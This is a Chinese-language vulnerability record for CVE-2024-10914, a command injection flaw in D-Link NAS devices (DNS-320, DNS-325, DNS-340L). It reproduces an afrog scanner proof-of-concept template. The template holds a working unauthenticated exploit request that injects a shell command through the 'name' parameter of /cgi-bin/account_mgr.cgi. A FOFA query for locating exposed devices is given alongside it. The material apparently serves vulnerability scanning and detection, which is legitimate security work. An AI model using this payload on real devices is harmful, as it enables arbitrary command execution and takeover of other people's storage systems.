漏洞信息
漏洞名称: D-Link NAS account_mgr.cgi远程命令执行漏洞
漏洞编号:
漏洞类型: 命令执行
漏洞等级: 严重
漏洞描述: D-Link NAS设备是一款网络附加存储设备,广泛用于家庭和小型企业环境中,提供文件共享、备份和数据存储功能。该设备的/cgi-bin/account_mgr.cgi接口存在命令注入漏洞,未经身份验证的攻击者可以通过发送特制的HTTP请求利用此漏洞执行任意系统命令。漏洞的技术根源在于account_mgr.cgi接口未对用户输入进行严格的验证和过滤,导致攻击者可以注入恶意命令。此漏洞的利用可能导致攻击者完全控制受影响的设备,包括但不限于执行任意命令、写入后门文件、获取服务器权限等严重后果。由于攻击者无需身份验证即可利用此漏洞,且攻击过程可以自动化,因此该漏洞的安全风险极高,建议用户立即采取防护措施。
产品厂商: D-Link
产品名称: D-Link NAS
影响版本: DNS-320 1.00, DNS-320LW 1.01.0914.2012, DNS-325 1.01, DNS-325 1.02, DNS-340L 1.08
搜索语法: app=”D_Link-DNS-ShareCenter”
来源: https://github.com/zan8in/afrog/blob/b9686a5c4553da942d9b8736d91cd87b6ee026b1/pocs%2Fafrog-pocs%2FCVE%2F2024%2FCVE-2024-10914.yaml
类型: zan8in/afrog:github commit
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37
| id: CVE-2024-10914
info: name: D-Link NAS account_mgr.cgi存在远程命令执行 author: zan8in severity: critical verified: true description: |- D-Link NAS设备的/cgi-bin/account_mgr.cgi接口处存在命令注入漏洞,未经身份验证的攻击者通过特制的HTTP请求可利用此漏洞执行任意系统命令,写入后门文件,获取服务器权限。 fofa: app="D_Link-DNS-ShareCenter" affected: |- DNS-320 1.00 DNS-320LW 1.01.0914.2012 DNS-325 1.01 DNS-325 1.02 DNS-340L 1.08 reference: - https://mp.weixin.qq.com/s/UILrkEAsD1CYlqEhbH9QZQ tags: dlink,cve,cve2024,rce,nas created: 2024/11/18
set: hostname: request.url.host command: "ifconfig" rules: r0: request: raw: |- GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;{{command}};%27 HTTP/1.1 Host: {{hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 expression: | response.status == 200 && response.body.bcontains(b'inet addr:') && response.body.ibcontains(b'Mask:') && response.body.bcontains(b"Content-type: text/html") expression: r0()
|